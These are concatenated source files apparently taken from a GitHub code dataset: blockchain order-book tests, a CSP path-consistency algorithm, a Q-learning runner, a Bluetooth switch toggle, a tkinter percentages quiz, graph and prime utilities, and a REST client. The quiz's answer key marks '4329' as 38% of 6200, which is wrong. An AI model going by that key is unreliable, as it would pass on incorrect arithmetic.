)\n)\n@run_for('testnet')\ndef test_get_order_book_with_different_values(node, ask_hbd_amount, ask_hive_amount, bid_hbd_amount, bid_hive_amount):\n wallet = tt.Wallet(attach_to=node)\n wallet.create_account('alice', hives=tt.Asset.Test(500), vests=tt.Asset.Test(100))\n\n wallet.api.create_order('alice', 0, tt.Asset.Test(ask_hive_amount), tt.Asset.Tbd(ask_hbd_amount), False, 3600)\n wallet.api.create_order('initminer', 1, tt.Asset.Tbd(bid_hbd_amount), tt.Asset.Test(bid_hive_amount), False, 3600)\n\n response = node.api.market_history.get_order_book()\n assert len(response['asks']) == 1\n assert len(response['bids']) == 1\n\n assert response['asks'][0]['order_price']['base'] == tt.Asset.Test(ask_hive_amount)\n assert response['asks'][0]['order_price']['quote'] == tt.Asset.Tbd(ask_hbd_amount)\n assert float(response['asks'][0]['real_price']) == ask_hbd_amount/ask_hive_amount\n\n assert response['bids'][0]['order_price']['base'] == tt.Asset.Tbd(bid_hbd_amount)\n assert response['bids'][0]['order_price']['quote'] == tt.Asset.Test(bid_hive_amount)\n assert float(response['bids'][0]['real_price']) == bid_hbd_amount/bid_hive_amount\n\n\n@run_for('testnet')\ndef test_get_order_book_after_successful_transaction_finishing_all_orders(node):\n wallet = tt.Wallet(attach_to=node)\n wallet.create_account('alice', hives=tt.Asset.Test(500), vests=tt.Asset.Test(100))\n\n wallet.api.create_order('alice', 0, tt.Asset.Test(300), tt.Asset.Tbd(50), False, 3600)\n wallet.api.create_order('initminer', 1, tt.Asset.Tbd(50), tt.Asset.Test(300), False, 3600)\n\n response = node.api.market_history.get_order_book()\n assert len(response['bids']) == 0\n assert len(response['asks']) == 0\n\n\n@run_for('testnet')\ndef test_exceed_limit_parameter(node):\n with pytest.raises(tt.exceptions.CommunicationError):\n node.api.market_history.get_order_book(limit=501)\n\n\n@pytest.mark.parametrize(\n 'limit', (1,2)\n)\n@run_for('testnet')\ndef test_limit(node, limit):\n wallet = tt.Wallet(attach_to=node)\n wallet.create_account('alice', hives=tt.Asset.Test(600), vests=tt.Asset.Test(300))\n\n wallet.api.create_order('alice', 0, tt.Asset.Test(100), tt.Asset.Tbd(100), False, 3600)\n wallet.api.create_order('initminer', 0, tt.Asset.Tbd(30), tt.Asset.Test(100), False, 3600)\n\n wallet.api.create_order('alice', 1, tt.Asset.Test(200), tt.Asset.Tbd(200), False, 3600)\n wallet.api.create_order('initminer', 1, tt.Asset.Tbd(40), tt.Asset.Test(200), False, 3600)\n if limit==2:\n wallet.api.create_order('alice', 2, tt.Asset.Test(300), tt.Asset.Tbd(300), False, 3600)\n wallet.api.create_order('initminer', 2, tt.Asset.Tbd(50), tt.Asset.Test(300), False, 3600)\n response = node.api.market_history.get_order_book(limit=limit)\n assert len(response['bids']) == limit\n assert len(response['asks']) == limit\n","repo_name":"openhive-network/hive","sub_path":"tests/functional/python_tests/api_tests/market_history_api_tests/test_get_order_book.py","file_name":"test_get_order_book.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"92"} +{"seq_id":"25376712045","text":"__Filename__ = 'pathConsistency.py'\n\n# Pour PC, vous pourrez simplifier la problématique\n# en considérant que dans le cas de son application\n# pour le projet, il n'y aura au plus que 2 valeurs par domaine.\n# Ainsi, comme ce sera très spécifique, vous pourriez en\n# tirer profit pour renforcer l'efficacité de l'algo implémenté\n# contrairement au cas général où la taille des domaine\n# est a priori quelconque.\n\nfrom genererJeuDeDonnees import*\nimport time\nimport numpy as np\n\n\ndef withoutSupportPC(i, j, k, a, b, jeuDD):\n \"\"\"s'il existe un support c du couple (a,b) appartenant au domaine de\n la kième variable, retourne False ;\n sinon, retourne True\"\"\"\n\n R_ik = jeuDD[i, k]\n cardinald_k = R_ik.shape[1]\n assert(cardinald_k <= 2)\n c = 0 # !!!Travailler avec domaine de Xk\n\n if (not(jeuDD[i, k, a, c] == 1 and jeuDD[j, k, b, c] == 1)) and cardinald_k == 2:\n c = 1\n\n return not(jeuDD[i, k, a, c] == 1 and jeuDD[j, k, b, c] == 1)\n\n\ndef initializationPC(jeuDD):\n listPC = []\n nbVar = jeuDD.shape[0]\n listeDeNone = [None] * nbVar\n # statusPC = [copy([copy(listeDeNone) for k in range(2)]) for i in range(nbVar)]\n statusPC = [[[False]*nbVar]*2]*nbVar\n # !!!range de k -> à modifier\n\n for i in range(nbVar): # nos variables sont indexées à partir de 0\n for j in range(nbVar):\n if i != j:\n domaine_i = jeuDD[i,j].shape[0]\n for a in range(domaine_i):\n statusPC[i][a][j] = False\n\n for i in range(nbVar):\n for j in range(i + 1, nbVar):\n for k in range(nbVar):\n if k != i and k != j:\n relationContrainte = jeuDD[i, j]\n domaine_a = relationContrainte.shape[0]\n domaine_b = relationContrainte.shape[1]\n for a in range(domaine_a):\n for b in range(domaine_b):\n if jeuDD[i, j, a, b] == 1: # !!!A verifier\n\n if withoutSupportPC(i,j,k,a,b, jeuDD):\n jeuDD[i, j, a, b] = 0\n jeuDD[j, i, b, a] = 0\n\n if not(statusPC[i][a][j]): # !!!A vérifier\n listPC.append((i, a, j))\n statusPC[i][a][j] = True\n\n if not(statusPC[j][b][i]):\n listPC.append((j, b, i))\n statusPC[j][b][i] = True\n return (listPC, statusPC)\n\n\ndef propagatePC(i, k, a, jeuDD, listPC, statusPC):\n assert(isinstance(i, int))\n assert (isinstance(k, int))\n #assert(isinstance(a, float)) #!!!A discuter\n\n nbVar = jeuDD.shape[0]\n relationContrainte = jeuDD[i, k]\n domaine_b = relationContrainte.shape[1]\n\n for j in range(nbVar):\n if j != i and j != k:\n for b in range(domaine_b):\n if jeuDD[i, j, a, b] == 1:\n if withoutSupportPC(i, j, k, a, b, jeuDD):\n jeuDD[i, j, a, b] = 0\n jeuDD[j, i, b, a] = 0\n\n if not(statusPC[i][a][j]):\n listPC.append((i, a, j))\n statusPC[i][a][j] = True\n\n if not(statusPC[j][b][i]):\n listPC.append((j, b, i))\n statusPC[j][b][i] = True\n\n\ndef algorithmPC8(jeuDD):\n init = initializationPC(jeuDD)\n listPC = init[0]\n statusPC = init[1]\n\n while len(listPC) > 0:\n threeTuple = listPC[0]\n listPC.remove(threeTuple)\n\n i = threeTuple[0]\n a = threeTuple[1]\n k = threeTuple[2]\n\n statusPC[i][a][k] = False\n propagatePC(i,k,a, jeuDD, listPC, statusPC)\n\n\n\n###########################################################################################\n#Exemples d'application\n\n##Exemple 1\n#jeu = genererJeuDeDonnees(3,2,2,0.5)\n#print(jeu)\n# print(algorithmPC8(jeu))\n\n##Exemple 2\n#R00 = [[0,0], [0,0]]\n#R01 = [[1,0],[0,1]]\n#R02 = [[0, 1], [1,0]]\n#R10 = [[1,0],[0,1]]\n#R12 = [[1,0], [1,1]]\n#R20 = [[0, 1], [1, 0]]\n#R21 = [[1,1],[0,1]]\n#jeuExCours = np.array([[R00, R01, R02], [R10, R00, R12], [R20, R21, R00]])\n#print(\"jeu original :\\n\",jeuExCours)\n\n#debut = time.time()\n#algorithmPC8(jeuExCours)\n#fin = time.time()\n\n#print(\"\\njeu après filtration :\\n\",jeuExCours)\n\n\n#print(\"Durée d'exécution: \",fin-debut)\n","repo_name":"LiseIL/ConstraintSatisfaction","sub_path":"pathConsistency.py","file_name":"pathConsistency.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36803990581","text":"import logging\nfrom pathlib import Path\n\nimport hydra\nfrom hydra.core.hydra_config import HydraConfig\nimport matplotlib.pyplot as plt\nfrom omegaconf import DictConfig\n\nfrom src.blackjack import BlackjackLearn, Reward\nfrom src.qlearning import BlackjackQTable\n\n\n@hydra.main(version_base=None, config_path='conf', config_name='blackjack')\ndef main(cfg: DictConfig) -> None:\n logger = logging.getLogger('main')\n\n outdir = Path(HydraConfig.get().runtime.output_dir)\n\n qtable = BlackjackQTable(gamma=0.99, alpha=0.1, shape=(32, 12, 2, 2)).set(init='runif')\n learner = BlackjackLearn(\n max_iter=8,\n # policy=lambda x: Action.mapper(eps_greedy(values=x, eps=1E-2, nactions=len(Action))),\n qtable=qtable, rewardspec=Reward(**cfg.rewardspec)\n )\n\n with plt.ion():\n plt.figure(figsize=(10, 10))\n plt.title(\"Q-Table\")\n rewards_episode = list()\n for i in range(cfg.n_episodes + 1):\n reward = learner.run_episode()\n rewards_episode.append(reward)\n logger.info(f'episode {i} : episode reward {reward}')\n\n if i % 50 == 0:\n qtable.plot(action=\"hit\")\n\n with open(outdir / f'episodes_{cfg.n_episodes}__rewards.csv', 'w') as f:\n f.writelines([f'{elem}\\n' for elem in rewards_episode])\n\n qtable.dump(path=outdir / f'episodes_{cfg.n_episodes}__BlackjackQTable.pickle')\n # qtable.plot(action=\"hit\", savefig_path=outdir / f'episodes_{cfg.n_episodes}__BlackjackQTable.png')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vmgustavo/202302-UFMG-RL","sub_path":"tp1/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38463847185","text":"import sys\nfrom itertools import permutations\n\nn,m,k = map(int, sys.stdin.readline().split())\nw = list(map(int, sys.stdin.readline().split()))\ncnt = 0\nans = []\narr = list(permutations(w,n))\nfor x in arr:\n tot = 0\n cnt = 0\n for i in range(k):\n basket = 0\n while True:\n basket += x[cnt]\n cnt = (cnt+1)%n\n if basket + x[cnt] > m:\n break\n tot += basket\n ans.append(tot)\nprint(min(ans))","repo_name":"gunsookim/std_py","sub_path":"std_numpy/softeer_택배마스터광우.py","file_name":"softeer_택배마스터광우.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15157864726","text":"import asyncio\r\nimport platform\r\n\r\nfrom bleak import BleakClient, BleakScanner\r\n\r\n\r\n\r\naddress = \"F2:CD:ED:18:5F:93\"\r\n\r\nSwitchService_UUID = \"a22b0090-ebdd-49ac-b2e7-40eb55f5d0ab\"\r\nSwitchService_hndl = 45\r\n\r\nOFF = b'\\x00'\r\nON = b'\\x01'\r\n\r\n\r\nimport platform\r\nimport asyncio\r\nimport logging\r\n\r\nfrom bleak import BleakClient\r\n\r\n\r\nasync def run(address, debug=False):\r\n\r\n async with BleakClient(address) as client:\r\n x = await client.is_connected()\r\n\r\n if bytes(await client.read_gatt_char(SwitchService_UUID)) == OFF:\r\n await client.write_gatt_char(SwitchService_UUID, ON)\r\n print(\"ON\")\r\n else:\r\n await client.write_gatt_char(SwitchService_UUID, OFF)\r\n print(\"OFF\")\r\n\r\n\r\nglobal loop\r\nloop = asyncio.get_event_loop()\r\n\r\ndef SWITCH():\r\n global loop\r\n\r\n \r\n while 1:\r\n try:\r\n loop.run_until_complete(run(address))\r\n break\r\n except:\r\n pass\r\n return\r\n\r\n\r\n\r\nimport keyboard as kb\r\n\r\n\r\nkb.add_hotkey(\"ctrl+`\", SWITCH, args= () )\r\nkb.wait(\"ctrl+esc\")\r\n","repo_name":"r1997mysm/switchmate-windows","sub_path":"Main_BleakVersion.py","file_name":"Main_BleakVersion.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"21710083164","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import models, migrations\n\nimport emr.models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('emr', '0048_observationcomponent_created_on'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProblemOrder',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order', emr.models.ListField(null=True, blank=True)),\n ('patient',\n models.ForeignKey(related_name='patient_problem_order', blank=True, to=settings.AUTH_USER_MODEL,\n null=True)),\n ('user', models.ForeignKey(related_name='user_problem_order', blank=True, to=settings.AUTH_USER_MODEL,\n null=True)),\n ],\n ),\n migrations.AlterModelOptions(\n name='observationcomponent',\n options={'ordering': ['created_on']},\n ),\n ]\n","repo_name":"smallbrainrecords/foundation","sub_path":"apps/emr/migrations/0049_auto_20160428_2117.py","file_name":"0049_auto_20160428_2117.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"73733772781","text":"import SimpleITK as sitk\nimport sys\n\nfile_name = sys.argv[1]\noutput_name = sys.argv[2]\nimage=sitk.ReadImage(file_name)\ninputImage = sitk.Cast(image, sitk.sitkFloat32)\ncorrector = sitk.N4BiasFieldCorrectionImageFilter()\noutputImage = corrector.Execute(inputImage)\noutputImage = sitk.Cast(outputImage,sitk.sitkUInt16)\nsitk.WriteImage(outputImage, output_name)","repo_name":"zhangsilu17/cb_norm_damage","sub_path":"N4.py","file_name":"N4.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"9363768732","text":"import tkinter as tk #imports tkinter package\r\nimport random #imports random package \r\n\r\nQuestions = [\r\n \"25% of 76\", #MPC\r\n \"18% of 200\", #MPC\r\n \"38% of 6200\", #MPC\r\n \"33.33% of $1200\", #MPC\r\n \"1.25% of $3275\", #MPC\r\n \"75% of $490\", #MPC\r\n \"15% of $1.60\", #MPC\r\n \"8% of $2\", #MPC\r\n \"66.66% of 930g\", #MPC\r\n \"15% of 180\", #MPC\r\n \"is 118% of 450 = 531\", #TORF\r\n \"is 115% of $40 = $50\", #TORF\r\n \"is 200% of 450 = 900 \", #TORF\r\n \"is 108% of $13.50 = $16.58\", #TORF\r\n \"is 72/480 in % = 15% \", #TORF\r\n \"is 13000 - 15% = 11050\", #TORF\r\n \"is 425 - 4% = 400\", #TORF\r\n \"is 450 - 85% = 65.5\", #TORF\r\n \"is 24/20 in % = 120% \", #TORF\r\n \"is 13000/10400 in % = 130%\" #TORF\r\n]\r\nButtonsText = [\r\n [\r\n \"18\", \"19\", \"25\" #19\r\n ],\r\n [\r\n \"36\", \"130\", \"30\" #36\r\n ],\r\n [\r\n \"4329\", \"2300\",\"2356\" #2356\r\n ],\r\n [\r\n \"$380\", \"$500\",\"$400\" #$400\r\n ],\r\n [\r\n \"$41\", \"$40.94\", \"$40\" #$40.94\r\n ],\r\n [\r\n \"$367.50\", \"$350\", \"$400\" #367.50\r\n ],\r\n [\r\n \"24 cents\", \"50 cents\", \"$24\" #24 cents\r\n ],\r\n [\r\n \"20 cents\", \"10\", \"16 cents\" #16 cents\r\n ],\r\n [\r\n \"550g\", \"700g\", \"620g\" #620g\r\n ],\r\n [\r\n \"30\", \"27\", \"50\" #27\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #false\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n]\r\n\r\nAnswers = [\r\n \"b\",\r\n \"a\",\r\n \"a\",\r\n \"c\",\r\n \"b\",\r\n \"a\",\r\n \"a\",\r\n \"c\",\r\n \"c\",\r\n \"b\",\r\n \"true\",\r\n \"false\",\r\n \"true\",\r\n \"false\",\r\n \"true\",\r\n \"true\",\r\n \"false\",\r\n \"false\",\r\n \"true\",\r\n \"false\"\r\n]\r\n\r\n\r\nShuffle1 = list(zip(Questions, Answers, ButtonsText)) #Creates a variable containing all three lists\r\nrandom.shuffle(Shuffle1) #Shuffles the variable with the lists \r\nQuestions, Answers, ButtonsText = zip(*Shuffle1) #redifines the lists \r\n\r\nCorrect = 0 #Declares Correct Variable to be global \r\nskips = 0 #Declares Skips Variable to be global \r\ni = 1 #Declares i Variable to be global \r\n\r\n\r\nclass StartScreen(): #Declares Questions class \r\n def __init__(self): #Initialises Output (First function to always run)\r\n global Questions #Calls Questions\r\n global Answers #Calls Answers\r\n global ButtonsText #Calls ButtonsText \r\n global i #Calls i\r\n global Correct #Calls Correct\r\n global skips #Calls skips\r\n Correct = 0 #defines Correct\r\n skips = 0 #defines skips\r\n i = 1 #defines i\r\n ButtonPressed = False #defines ButtonPressed\r\n\r\n self.root = tk.Tk() #initialises window \r\n self.root.geometry('800x500') #sets window size\r\n self.root.configure(bg='#cfe2f3') #sets window colour\r\n self.root.title(\"Percentages Math Quiz\") #sets window name\r\n Title = tk.Label(self.root, text=\"PERCENTAGES MATH QUIZ\", bg=\"#cceae3\", font=\"Arial 18\",width=28,height=3 ,borderwidth=1, relief=\"solid\").place(x=225, y=80) #initialises Title text\r\n Quit = tk.Button(self.root,\r\n text = 'QUIT', borderwidth=1, relief=\"solid\", bg=\"#cceae3\", width=15, height=2, font=\"Arial 14\",\r\n command = lambda : quit()).place(x=610, y=425) #Initialises quit button\r\n Start = tk.Button(self.root,\r\n text = \"START\", borderwidth=1, relief=\"solid\", bg=\"#cceae3\", width=20, height=3, font=\"Arial 14\",\r\n command = lambda : self.Starts()).place(x=320, y=200) #Initialises start button\r\n InstTitle = tk.Label(self.root, text=\"INSTRUCTIONS\", bg=\"#cceae3\", font=\"Arial 14\",width=15,height=2 ,borderwidth=1, relief=\"solid\").place(x=10, y=340) #prints Instructions title\r\n Inst = tk.Label(self.root, text=\"This will be a 10 question quiz made\\nup of true/false and multiple choice\\nquestions. You will be given a NCEA grade.\\nYou can only skip 3 times\", bg=\"#cceae3\", font=\"Arial 12\",width=35,height=5,borderwidth=1, relief=\"solid\").place(x=10, y=390) #prints Instructions\r\n self.root.mainloop() #loops window\r\n\r\n def Starts(self): #start button function\r\n self.root.destroy() #destroys window\r\n second = Question() #goes to questions class\r\n\r\n\r\nclass Question(): #start of questions class\r\n\r\n def __init__(self): #initialiser function\r\n global Correct #calls Correct \r\n global skips #calls skips\r\n global i #calls i\r\n global ButtonPressed #calls ButtonPressed\r\n while i < 11 + skips: #start of question loop\r\n if len(ButtonsText[i]) == 3: #checks if multiple choice question\r\n ButtonPressed = False #resets buttons\r\n self.Setup3btn(Questions[i], ButtonsText[i][0], ButtonsText[i][1], ButtonsText[i][2], Answers[i], i) #calls setup for multiple choice questions\r\n elif len(ButtonsText[i]) == 2: #checks if true or false question\r\n ButtonPressed = False #resets buttons\r\n self.Setup2btn(Questions[i], ButtonsText[i][0], ButtonsText[i][1], Answers[i], i) #calls setup for true or false questions\r\n else: #error handling\r\n quit() #quits if encounters an error\r\n third = FinalScreen() #goes to results screen class\r\n\r\n\r\n def Setup3btn(self, Question, ButtonOne, ButtonTwo, ButtonThree, Answer, LCV): #Start of multiple choice screen \r\n global skips #Calls skips\r\n self.root = tk.Tk() #initialises window\r\n self.root.geometry('800x500') #sets window size\r\n self.root.configure(bg='#cfe2f3') #sets background colour\r\n self.root.title(\"Percentages Math Quiz\") #sets window title \r\n QuestNum = tk.Label(self.root, text=\"Question \" + str(LCV - skips) + \"/10\", bg=\"#cceae3\", font=\"Arial 14\", width=15,\r\n height=2, borderwidth=1, relief=\"solid\").place(x=5, y=5) #prints which question the user is on\r\n Quest = tk.Label(self.root, text=Question, bg=\"#cceae3\", font=\"Arial 18\", width=28, height=3, borderwidth=1,\r\n relief=\"solid\").place(x=210, y=150) #prints question\r\n\r\n ButtonA = tk.Button(self.root,\r\n text=str(ButtonOne), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n width=6, height=1,\r\n command=lambda: self.Buttons(Answer, \"a\")).place(x=260, y=260) #initialises Button a\r\n\r\n ButtonB = tk.Button(self.root,\r\n text=str(ButtonTwo), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n width=6, height=1,\r\n command=lambda: self.Buttons(Answer, \"b\")).place(x=360, y=260) #initialises button b \r\n\r\n ButtonC = tk.Button(self.root,\r\n text=str(ButtonThree), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n width=6, height=1,\r\n command=lambda: self.Buttons(Answer, \"c\")).place(x=460, y=260) #initalises button c\r\n SkipButton = tk.Button(self.root,\r\n text=\"Skip Question\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n width=12, height=1,\r\n command=lambda: self.Skip()).place(x=640, y=450) #initialises skip button\r\n if ButtonPressed == True: #checks if an option has been selected\r\n return #returns to loop\r\n else: #checks if button has been selected\r\n self.root.mainloop() #loops window again\r\n return #returns to loop\r\n\r\n\r\n\r\n def Setup2btn(self, Question, Button1, Button2, Answer, LCV): #start of true or false window \r\n global skips #calls skips\r\n self.root = tk.Tk() #initialises window\r\n self.root.geometry('800x500') #sets window size\r\n self.root.configure(bg='#cfe2f3') #sets background colour\r\n self.root.title(\"Percentages Math Quiz\") #sets window title\r\n QuestNum = tk.Label(self.root, text=\"Question \" + str(LCV - skips) + \"/10\", bg=\"#cceae3\", font=\"Arial 14\", width=15,\r\n height=2, borderwidth=1, relief=\"solid\").place(x=5, y=5) #prints question number\r\n Quest = tk.Label(self.root, text=Question, bg=\"#cceae3\", font=\"Arial 18\", width=28, height=3, borderwidth=1,\r\n relief=\"solid\").place(x=210, y=150) #prints question\r\n\r\n ButtonA = tk.Button(self.root,\r\n text=str(Button1), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n width=6, height=1,\r\n command=lambda: self.Buttons(Answer, \"true\")).place(x=320, y=260) #initialises button a\r\n\r\n ButtonB = tk.Button(self.root,\r\n text=str(Button2), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n width=6, height=1,\r\n command=lambda: self.Buttons(Answer, \"false\")).place(x=420, y=260) #initialises button b \r\n\r\n SkipButton = tk.Button(self.root,\r\n text=\"Skip Question\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n width=12, height=1,\r\n command=lambda: self.Skip()).place(x=640, y=450) #initialises skip button\r\n if ButtonPressed == True: #checks if a button has been pressed\r\n return #returns to loop\r\n else: #checks if a button hasnt been pressed\r\n self.root.mainloop() #loops window\r\n return #returns to loop\r\n\r\n\r\n\r\n def Buttons(self, Answer, ButtonTypes): #button functions\r\n global ButtonPressed #calls ButtonPressed\r\n if Answer == ButtonTypes: #checks if correct answer has been selected\r\n ButtonPressed = True #changes the button pressed variable\r\n global Correct #calls Correct\r\n global i #calls i \r\n Correct = Correct + 1 #iterates Correct\r\n i = i + 1 #iterates i \r\n elif Answer != ButtonTypes: #checks if answer was incorrect\r\n i = i + 1 #iterates i\r\n ButtonPressed = True #changes the button pressed variable\r\n self.root.destroy() #destroys the window\r\n second = Question() #Goes back to question class\r\n \r\n\r\n\r\n def Skip(self): #skip button function\r\n global ButtonPressed #calls ButtonPressed \r\n ButtonPressed = True #sets the button pressed to true\r\n global skips #calls skips\r\n global i #calls 9\r\n if skips < 3: #checks if user is able to skip\r\n skips = skips + 1 #iterates skips\r\n i = i + 1 #iterates i\r\n self.root.destroy() #destroys window\r\n second = Question() #goes to Question class\r\n else: #checks if user has gone over their skip limit\r\n ButtonPressed = False #resets button pressed\r\n return #returns to question function\r\n \r\nclass FinalScreen(): #Declares Results class\r\n def __init__(self): #initialises window\r\n\r\n global Correct #calls Correct\r\n percents = Correct/10 #calcultes percentage of correct answers\r\n #marking schedule and defines the grade\r\n if percents < 0.5: \r\n Grade = \"N/A\"\r\n elif percents > 0.49 and percents < 0.7:\r\n Grade = \"A\"\r\n elif percents > 0.69 and percents < 0.9:\r\n Grade = \"M\"\r\n elif percents > 0.89 and percents < 1.01:\r\n Grade = \"E\"\r\n else: #error handling\r\n quit() #quits code\r\n self.root = tk.Tk() #initialises window\r\n self.root.geometry('800x500') #sets window size\r\n self.root.configure(bg='#cfe2f3') #Sets background colour\r\n self.root.title(\"Percentages Math Quiz\") #sets window title \r\n\r\n Title = tk.Label(self.root, text=\"Results\", bg=\"#cceae3\", font=\"Arial 18\", width=15,\r\n height=2, borderwidth=1, relief=\"solid\").place(x=330, y=120) #prints title\r\n Result = tk.Label(self.root, text=Grade + \"\\n\" + \"You Got: \" + str(Correct) + \"/10\", bg=\"#cceae3\", font=\"Arial 20\",\r\n width=20,\r\n height=5, borderwidth=1, relief=\"solid\").place(x=270, y=200) #prints the results \r\n\r\n TryAgn = tk.Button(self.root, text=\"TRY AGAIN\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n width=12, height=1,\r\n command=lambda: self.tryAgain()).place(x=640, y=450) #initialises try again button\r\n\r\n QuitButton = tk.Button(self.root, text=\"QUIT\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n width=12, height=1, command=lambda: quit()).place(x=10, y=450) #initialises quit button\r\n\r\n self.root.mainloop() #loops window\r\n\r\n def tryAgain(self): #function for try again button\r\n self.root.destroy() #destroys window\r\n StartScreen() #goes to Questions class\r\n \r\napp = StartScreen() #sets starting window\r\n","repo_name":"zachpickles/13-PRG-Project-","sub_path":"Math Quiz.py","file_name":"Math Quiz.py","file_ext":"py","file_size_in_byte":14061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"24012731324","text":"nodes = (1,2,3,4,5,6,7,8,9)\nedges = [(1,4),(7,1),(4,7),(9,7), (9,3), (3,6), (6,9),(8,6),(8,5),(5,2),(2,8)]\n\ndef reverse_graph(edges):\n rev = [(e[1],e[0]) for e in edges]\n return rev\n\n\ndef call_1st_loop(nodes, edges):\n edges = reverse_graph(edges)\n order = dfs_loop(nodes,edges)\n return order\n \ndef call_2nd_loop(order, edges):\n explored = set()\n curr_s = None\n lead_comp = {}\n for ft in range(len(nodes), 0, -1):\n i = order[ft]\n if i not in explored:\n curr_s = i\n explored = dfs_lead(edges, curr_s, i, explored, lead_comp)\n return lead_comp\n\n\n\ndef dfs_loop(nodes,edges):\n ft_node = {}\n finish_t = 0\n explored = set()\n curr_s = None\n for i in range(len(nodes), 0, -1):\n if i not in explored:\n curr_s = i\n finish_t, explored = dfs(nodes,edges, finish_t, curr_s, i, explored, ft_node)\n \n return ft_node\n \n \ndef dfs(nodes,edges, finish_t, curr_s, node_i, explored,ft_node):\n explored.add(node_i)\n leader = curr_s\n el_edges = [e for e in edges if e[0] == node_i]\n for edge in el_edges:\n v = edge[1]\n if v not in explored:\n finish_t, explored = dfs(nodes,edges, finish_t,leader, v, explored, ft_node)\n finish_t = finish_t + 1\n #print(\"finish time of node %s is %s\" % (node_i,finish_t))\n ft_node[finish_t] = node_i\n #print(\"leader of %s node is %s\" % (node_i, leader))\n return finish_t, explored\n\ndef dfs_lead(edges, curr_s, node_i,explored,lead_comp):\n explored.add(node_i)\n leader = curr_s\n el_edges = [e for e in edges if e[0] == node_i]\n for edge in el_edges:\n v = edge[1]\n if v not in explored:\n explored = dfs_lead(edges, leader, v, explored, lead_comp)\n if leader not in lead_comp:\n lead_comp.setdefault(leader,[]) \n lead_comp[leader].append(node_i)\n return explored\n \n \norder = call_1st_loop(nodes, edges)\nprint(call_2nd_loop(order, edges))\n \n \n\n","repo_name":"liu1992yang/algorithm_class_hw","sub_path":"scc_test.py","file_name":"scc_test.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22803630206","text":"import itertools\n\ndef prime_numbers():\n # Handle the first prime\n yield 2\n prime_cache = [2] # Cache of primes\n\n # Loop over positive, odd integers\n for n in itertools.count(3, 2):\n is_prime = True\n\n # Check to see if any prime number divides n\n for p in prime_cache:\n if n % p == 0: # p divides n evenly\n is_prime = False\n break\n\n # is it prime?\n if is_prime:\n prime_cache.append(n)\n yield n\n\nfor p in prime_numbers():\n print(p)\n if p > 100:\n break\n ","repo_name":"eddy-di/learning_python","sub_path":"stepik_examples/generators_learning.py","file_name":"generators_learning.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38258236864","text":"# coding=utf-8\n'''*****************************************************\n* Author: Steven Alves *\n* Universidade: UniMindelo *\n* UC: WebServices *\n* Git-Hub: https://github.com/xredocx215sevlanevets *\n* Last-Update: 12/01/2020 *\n* Cliente: Python3.7 *\n*****************************************************'''\n\nimport requests\nimport json\nimport sys\n\n# Cabeçalhos HTTP\nheader = {\n 'user-agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0\",\n 'Content-type': 'application/json'\n}\n\n\n# Programa Principal\ndef Main():\n while True:\n print(\"\")\n print(\"Digite 'Control + C' para sair do programa\")\n print(\"\")\n PrintMenu()\n escolha = input(\"Escolha: \")\n if escolha == \"1\":\n getItems()\n elif escolha == \"2\":\n nome_item = input(\"Nome do item a recuperar: \")\n getItem(nome_item)\n elif escolha == \"3\":\n nome_item = input(\"Nome do item a enviar: \")\n preco_item = input(\"Preco do item a enviar: \")\n postItem(nome_item, preco_item)\n elif escolha == \"4\":\n nome_item = input(\"Nome do item a deletar: \")\n deleteItem(nome_item)\n elif escolha == \"5\":\n nome_item = input(\"Nome do item a alterar/criar: \")\n putItem(nome_item)\n else:\n print(\"Escolha inválida\")\n print(\"-\"*50)\n\n\n# 